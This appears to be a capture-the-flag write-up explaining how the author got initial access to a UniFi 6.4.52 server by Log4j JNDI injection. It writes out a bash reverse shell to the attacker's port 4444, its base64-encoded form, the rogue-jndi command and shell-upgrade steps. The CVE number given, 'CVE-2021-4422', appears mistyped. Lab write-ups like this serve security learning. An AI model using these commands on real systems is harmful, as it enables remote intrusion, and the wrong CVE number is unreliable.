port 8443 [Initial access]

This port has a website hosted named UniFI with version number 6.4.52.

On searching, I found one exploit related to this version of software. With CVE as "CVE-2021-4422".

This exploit is related to Log4j Remote Code Execution.

Another Log4j on the fire: UnifiSprocket Security

The above article will guide you on how to perform the attack.

we need to install Java and Maven first.

Normally, Kali Linux has Java installed in it. You can check using the below command:

java --version

if not present then install it.

We can install Maven using below command:

sudo apt install maven -y

First, we need to clone and build the tool, rogue-jndi from the GitHub repository linked below:

GitHub - veracode-research/rogue-jndi: A malicious LDAP server for JNDI injection attacksGitHub

git clone https://github.com/veracode-research/rogue-jndi && cd rogue-jndi && mvn package

This above command will do everything that is needed.

Now we will craft the reverse shell.

echo "bash -c bash -i >&/dev/tcp/$IP_KALI/4444 0>&1" | base64

With that Base64 output, build your command in rogue-jndi:

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuOS80NDQ0IDA+JjEK}|{base64,-d}|{bash,-i}" --hostname "$IP_KALI"

Replace the hostname variable with the public or local IP of the host you will run the command from. Then start your rogue-jndi LDAP server up.

Now we will make modifications in the request we have captured using Burp Suite and then send it.

Now after that, you will get the shell.

Although, In the response, we got the error we can see that we got a connection in the listener.

stabilize the shell.

which python3
which python

No python is present here.

I will upgrade the shell using the script command.

script /dev/null -c bash

Add this to the cheat sheet. [Delete this after adding]

PreviousUnified - starting point Nextprivilege escalation

Last updated 11 months ago

Was this helpful?